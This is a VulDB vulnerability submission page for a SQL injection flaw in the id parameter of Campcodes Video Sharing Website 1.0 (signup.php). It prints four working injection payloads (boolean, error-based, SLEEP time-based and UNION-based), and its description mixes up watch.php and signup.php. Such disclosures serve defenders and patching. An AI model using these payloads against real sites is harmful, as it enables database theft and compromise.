Submit #114046: SQL injection vulnerability exists in Video Sharing Websiteinfo

TitelSQL injection vulnerability exists in Video Sharing Website
BeschreibungSQL injection vulnerability exists in id parameter of signup.php file of Video Sharing Website Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. When visit index.php and page parameter is ‘watch’,it will include watch.php,and id parameter can do sql injection. Payload: id=4/(3*2-5) AND 6049=6049&page=signup or id=(SELECT 3638 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(3638=3638,1))),0x71706a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&page=signup or id=4/(3*2-5) AND (SELECT 3130 FROM (SELECT(SLEEP(5)))puzr)&page=signup or id=-8745 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787071,0x727a724e6745556d4849654c546d766f6b4645526f78706a4877484d6e75696e4e50444f5271645a,0x71706a7a71),NULL,NULL,NULL-- -&page=signup
Quelle⚠️ https://github.com/E1CHO/cve_hub/blob/main/Video%20Sharing%20Website/Video%20Sharing%20Website%20vuln%203.pdf
Benutzer
 SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874)
Einreichung14.04.2023 06:10 (vor 3 Jahren)
Moderieren14.04.2023 08:21 (2 hours later)
StatusAkzeptiert
VulDB Eintrag225913 [Campcodes Video Sharing Website 1.0 signup.php ID SQL Injection]
Punkte20

Do you want to use VulDB in your project?

Use the official API to access entries easily!